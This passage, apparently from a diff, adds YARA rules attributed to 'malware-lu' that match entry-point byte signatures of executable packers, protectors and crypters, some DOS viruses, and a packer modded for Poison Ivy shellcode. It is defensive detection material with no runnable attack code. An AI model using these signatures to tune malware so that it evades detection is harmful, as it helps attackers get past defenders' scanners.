+		$a0 = { 51 68 ?? ?? ?? ?? 87 2C 24 8B CD 5D 81 E1 ?? ?? ?? ?? E9 ?? ?? ?? 00 89 45 F8 51 68 ?? ?? ?? ?? 59 81 F1 ?? ?? ?? ?? 0B 0D ?? ?? ?? ?? 81 E9 ?? ?? ?? ?? E9 ?? ?? ?? 00 81 C2 ?? ?? ?? ?? E8 ?? ?? ?? 00 87 0C 24 59 51 64 8B 05 30 00 00 00 8B 40 0C 8B 40 0C E9 ?? ?? ?? 00 F7 D6 2B D5 E9 ?? ?? ?? 00 87 3C 24 8B CF 5F 87 14 24 1B CA E9 ?? ?? ?? 00 83 C4 08 68 ?? ?? ?? ?? E9 ?? ?? ?? 00 C3 E9 ?? ?? ?? 00 E9 ?? ?? ?? 00 50 8B C5 87 04 24 8B EC 51 0F 88 ?? ?? ?? 00 FF 05 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 0C 24 59 99 03 04 24 E9 ?? ?? ?? 00 C3 81 D5 ?? ?? ?? ?? 9C E9 ?? ?? ?? 00 81 FA ?? ?? ?? ?? E9 ?? ?? ?? 00 C1 C3 15 81 CB ?? ?? ?? ?? 81 F3 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 87 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Frusionbiff
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 55 56 57 68 04 01 00 00 C7 44 24 14 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule OpenSourceCodeCrypterp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 09 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 34 44 40 00 E8 28 F8 FF FF 33 C0 55 68 9F 47 40 00 64 FF 30 64 89 20 BA B0 47 40 00 B8 1C 67 40 00 E8 07 FD FF FF 8B D8 85 DB 75 07 6A 00 E8 C2 F8 FF FF BA 28 67 40 00 8B C3 8B 0D 1C 67 40 00 E8 F0 E0 FF FF BE 01 00 00 00 B8 2C 68 40 00 E8 E1 F0 FF FF BF 0A 00 00 00 8D 55 EC 8B C6 E8 92 FC FF FF 8B 4D EC B8 2C 68 40 00 BA BC 47 40 00 E8 54 F2 FF FF A1 2C 68 40 00 E8 52 F3 FF FF 8B D0 B8 20 67 40 00 E8 A2 FC FF FF 8B D8 85 DB 0F 84 52 02 00 00 B8 24 67 40 00 8B 15 20 67 40 00 E8 78 F4 FF FF B8 24 67 40 00 E8 7A F3 FF FF 8B D0 8B C3 8B 0D 20 67 40 00 E8 77 E0 FF FF 8D 55 E8 A1 24 67 40 00 E8 42 FD FF FF 8B 55 E8 B8 24 67 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule QrYPt0rbyNuTraL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 F9 00 0F 84 8D 01 00 00 8A C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 32 C1 3C F3 75 89 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BA D9 04 00 00 E8 00 00 00 00 5F 81 C7 16 01 00 00 80 2C 3A 01 }
+	$a1 = { 86 18 CC 64 FF 35 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 89 25 00 00 00 00 BB 00 00 F7 BF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B8 78 56 34 12 87 03 E8 CD FE FF FF E8 B3 }
+	$a2 = { EB 00 E8 B5 00 00 00 E9 2E 01 00 00 64 FF 35 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 89 25 00 00 00 00 8B 44 24 04 }
+
+condition:
+		$a0 or $a1 or $a2 at pe.entry_point
+}
+	
+	
+rule EXECryptor2xxmaxcompressedresources
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC FC 53 57 56 89 45 FC 89 55 F8 89 C6 89 D7 66 81 3E 4A 43 0F 85 23 01 00 00 83 C6 0A C7 45 F4 08 00 00 00 31 DB BA 00 00 00 80 43 31 C0 E8 11 01 00 00 73 0E 8B 4D F0 E8 1F 01 00 00 02 45 EF AA EB E9 E8 FC 00 00 00 0F 82 97 00 00 00 E8 F1 00 00 00 73 5B B9 04 00 00 00 E8 FD 00 00 00 48 74 DE 0F 89 C7 00 00 00 E8 D7 00 00 00 73 1B 55 BD 00 01 00 00 E8 D7 00 00 00 88 07 47 4D 75 F5 E8 BF 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 C8 00 00 00 83 C0 07 89 45 F0 C6 45 EF 00 83 F8 08 74 89 E8 A9 00 00 00 88 45 EF E9 7C FF FF FF B9 07 00 00 00 E8 A2 00 00 00 50 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upackv024v028AlphaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 40 00 AD ?? ?? 95 AD 91 F3 A5 AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded24222428Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D 9B 1A 00 00 B9 84 1A 00 00 BA 14 1B 00 00 BE 00 10 00 00 BF B0 53 00 00 BD E0 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv1051
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 03 C7 84 E8 EB 03 C7 84 9A E8 00 00 00 00 5D 81 ED 10 00 00 00 EB 03 C7 84 E9 64 A0 23 00 00 00 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeZCode101FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E9 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E9 FB FF FF FF C3 68 00 00 00 00 64 FF 35 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPacker
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 8B 35 70 01 40 ?? 83 EE 40 6A 40 68 ?? 30 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ProgramProtectorXPv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 58 83 D8 05 89 C3 81 C3 ?? ?? ?? ?? 8B 43 64 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack111Method2NTbagieTMX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032aemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 }
+	$a1 = { EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 }
+	$a2 = { E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF FF FF 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C }
+
+condition:
+		$a0 or $a1 or $a2 at pe.entry_point
+}
+	
+	
+rule VxHafen1641
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 01 ?? ?? ?? CE CC 25 ?? ?? 25 ?? ?? 25 ?? ?? 40 51 D4 ?? ?? ?? CC 47 CA ?? ?? 46 8A CC 44 88 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NativeUDPacker11ModdedPoisonIvyShellcodeokkixot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 C0 31 DB 31 C9 EB 0E 6A 00 6A 00 6A 00 6A 00 FF 15 28 41 40 00 FF 15 94 40 40 00 89 C7 68 88 13 00 00 FF 15 98 40 40 00 FF 15 94 40 40 00 81 C7 88 13 00 00 39 F8 73 05 E9 84 00 00 00 6A 40 68 00 10 00 00 FF 35 04 30 40 00 6A 00 FF 15 A4 40 40 00 89 C7 FF 35 04 30 40 00 68 CA 10 40 00 50 FF 15 A8 40 40 00 6A 40 68 00 10 00 00 FF 35 08 30 40 00 6A 00 FF 15 A4 40 40 00 89 C6 68 00 30 40 00 FF 35 04 30 40 00 57 FF 35 08 30 40 00 50 6A 02 FF 15 4E 41 40 00 6A 00 6A 00 6A 00 56 6A 00 6A 00 FF 15 9C 40 40 00 50 6A 00 6A 00 6A 11 50 FF 15 4A 41 40 00 58 6A FF 50 FF 15 AC 40 40 00 6A 00 FF 15 A0 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor2xxcompressedresources
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 56 57 53 31 DB 89 C6 89 D7 0F B6 06 89 C2 83 E0 1F C1 EA 05 74 2D 4A 74 15 8D 5C 13 02 46 C1 E0 08 89 FA 0F B6 0E 46 29 CA 4A 29 C2 EB 32 C1 E3 05 8D 5C 03 04 46 89 FA 0F B7 0E 29 CA 4A 83 C6 02 EB 1D C1 E3 04 46 89 C1 83 E1 0F 01 CB C1 E8 05 73 07 43 89 F2 01 DE EB 06 85 DB 74 0E EB A9 56 89 D6 89 D9 F3 A4 31 DB 5E EB 9D 89 F0 5B 5F 5E C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule NXPEPackerv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 60 FF CA FF 00 BA DC 0D E0 40 00 50 00 60 00 70 00 80 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyBoxCAnskya
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 E4 41 00 10 E8 3A E1 FF FF 33 C0 55 68 11 44 00 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 6A 0A 68 20 44 00 10 A1 1C 71 00 10 50 E8 CC E1 ?? ?? ?? ?? 85 DB 0F 84 77 01 00 00 53 A1 1C 71 00 10 50 E8 1E E2 FF FF 8B F0 85 F6 0F 84 61 01 00 00 53 A1 1C 71 00 10 50 E8 E0 E1 FF FF 85 C0 0F 84 4D 01 00 00 50 E8 DA E1 FF FF 8B D8 85 DB 0F 84 3D 01 00 00 56 B8 70 80 00 10 B9 01 00 00 00 8B 15 98 41 00 10 E8 9E DE FF FF 83 C4 04 A1 70 80 00 10 8B CE 8B D3 E8 E1 E1 FF FF 6A 00 6A 00 A1 70 80 00 10 B9 30 44 00 10 8B D6 E8 F8 FD FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule UPolyXv05
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC ?? 00 BD 46 00 8B ?? B9 ?? 00 00 00 80 ?? ?? 51 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a1 = { 83 EC 04 89 14 24 59 BA ?? 00 00 00 52 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 }
+	$a2 = { BB 00 BD 46 00 83 EC 04 89 1C 24 ?? B9 ?? 00 00 00 80 33 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a3 = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 ?? 00 BD 46 00 83 EC 04 89 ?? 24 B9 ?? 00 00 00 81 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a4 = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 ?? 00 BD 46 00 ?? B9 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a5 = { EB 01 C3 ?? 00 BD 46 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 or $a1 or $a2 or $a3 or $a4 or $a5
+}
+	
+	
+rule beriav007publicWIPsymbiont
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 18 53 8B 1D 00 30 ?? ?? 55 56 57 68 30 07 00 00 33 ED 55 FF D3 8B F0 3B F5 74 0D 89 AE 20 07 00 00 E8 88 0F 00 00 EB 02 33 F6 6A 10 55 89 35 30 40 ?? ?? FF D3 8B F0 3B F5 74 09 89 2E E8 3C FE FF FF EB 02 33 F6 6A 18 55 89 35 D8 43 ?? ?? FF D3 8B F0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCGuardv405dv410dv415d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 55 50 E8 00 00 00 00 5D EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule asscrypterbysantasdad
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 ?? ?? ?? ?? 89 45 EC B8 98 40 00 10 E8 AC EA FF FF 33 C0 55 68 78 51 00 10 64 ?? ?? ?? ?? 20 6A 0A 68 88 51 00 10 A1 E0 97 00 10 50 E8 D8 EA FF FF 8B D8 53 A1 E0 97 00 10 50 E8 12 EB FF FF 8B F8 53 A1 E0 97 00 10 50 E8 DC EA FF FF 8B D8 53 E8 DC EA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 F0 97 00 10 E8 C9 E7 FF FF B8 F0 97 00 10 E8 B7 E7 FF FF 8B CF 8B D6 E8 EE EA FF FF 53 E8 98 EA FF FF 8D 4D EC BA 9C 51 00 10 A1 F0 97 00 10 E8 22 EB FF FF 8B 55 EC B8 F0 97 00 10 E8 89 E6 FF FF B8 F0 97 00 10 E8 7F E7 FF FF E8 6E EC FF FF 33 C0 5A 59 59 64 89 10 68 7F 51 00 10 8D 45 EC E8 11 E6 FF FF C3 E9 FF DF FF FF EB F0 5F 5E 5B E8 0D E5 FF FF 00 53 45 54 54 49 4E 47 53 00 00 00 00 FF FF FF FF 1C 00 00 00 45 4E 54 45 52 20 59 4F 55 52 20 4F 57 4E 20 50 41 53 53 57 4F 52 44 20 48 45 52 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CopyControlv303
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { CC 90 90 EB 0B 01 50 51 52 53 54 61 33 61 2D 35 CA D1 07 52 D1 A1 3C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110Engbartxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Elanguage
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 06 00 00 00 50 E8 ?? 01 00 00 55 8B EC 81 C4 F0 FE FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXELOCK66615
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? BF ?? ?? EB ?? EA ?? ?? ?? ?? 79 ?? 7F ?? 7E ?? 1C ?? 48 78 ?? E3 ?? 45 14 ?? 5A E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AdysGluev010
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E 8C 06 ?? ?? 0E 07 33 C0 8E D8 BE ?? ?? BF ?? ?? FC B9 ?? ?? 56 F3 A5 1E 07 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv132
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv114v115v1203
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B ?? ?? ?? 72 ?? B4 09 BA ?? 01 CD 21 CD 20 4E 6F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SafeGuardV10Xsimonzh2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 EB 29 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 59 9C 81 C1 E2 FF FF FF EB 01 ?? 9D FF E1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev102v103DLLBoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild023GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 E1 FD FF FF 6A 00 E8 0C 00 00 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivatePersonalPackerPPP102ConquestOfTroycom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 17 00 00 00 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 E8 D3 03 00 00 A3 20 37 00 10 50 6A 00 E8 DE 03 00 00 A3 24 37 00 10 FF 35 20 37 00 10 6A 00 E8 EA 03 00 00 A3 30 37 00 10 FF 35 24 37 00 10 E8 C2 03 00 00 A3 28 37 00 10 8B 0D 30 37 00 10 8B 3D 28 37 00 10 EB 09 49 C0 04 39 55 80 34 39 24 0B C9 }
+
+condition:
+		$a0
+}
+	
+	
+rule DIETv102bv110av120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? BF ?? ?? B9 ?? ?? 3B FC 72 ?? B4 4C CD 21 FD F3 A5 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXECLiPSElayer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1334ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 }
+	$a1 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PKLITEv150Devicedrivercompression
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 09 BA 14 01 CD 21 B8 00 4C CD 21 F8 9C 50 53 51 52 56 57 55 1E 06 BB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxGrazie883
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 0E 1F 50 06 BF 70 03 B4 1A BA 70 03 CD 21 B4 47 B2 00 BE 32 04 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PROTECTEXECOMv60
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E B4 30 CD 21 3C 02 73 ?? CD 20 BE ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ENIGMAProtectorSukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 45 6E 69 67 6D 61 20 70 72 6F 74 65 63 74 6F 72 20 76 31 }
+
+condition:
+		$a0
+}
+	
+	
+rule CRYPToCRACksPEProtectorV093LukasFleischer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 33 8B F3 03 73 3C 81 3E 50 45 00 00 75 26 0F B7 46 18 8B C8 69 C0 AD 0B 00 00 F7 E0 2D AB 5D 41 4B 69 C9 DE C0 00 00 03 C1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv147v150
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 5B 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PocketPCMIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 FF BD 27 14 00 BF AF 18 00 A4 AF 1C 00 A5 AF 20 00 A6 AF 24 00 A7 AF ?? ?? ?? 0C 00 00 00 00 18 00 A4 8F 1C 00 A5 8F 20 00 A6 8F ?? ?? ?? 0C 24 00 A7 8F ?? ?? ?? 0C 25 20 40 00 14 00 BF 8F 08 00 E0 03 18 00 BD 27 ?? FF BD 27 18 00 ?? AF ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4ExtractableVirusShield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 40 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxNoon1163
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5B 50 56 B4 CB CD 21 3C 07 ?? ?? 81 ?? ?? ?? 2E ?? ?? 4D 5A ?? ?? BF 00 01 89 DE FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PuNkMoD1xPuNkDuDe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 94 B9 ?? ?? 00 00 BC ?? ?? ?? ?? 80 34 0C }
+
+condition:
+		$a0
+}
+	
+	
+rule PECrypt32Consolev10v101v102
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModulev2018
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 B8 53 56 57 33 C0 89 45 F0 89 45 BC 89 45 B8 E8 73 71 FF FF E8 DA 85 FF FF E8 81 A7 FF FF E8 C8 }
+
+condition:
+		$a0
+}
+	
+	
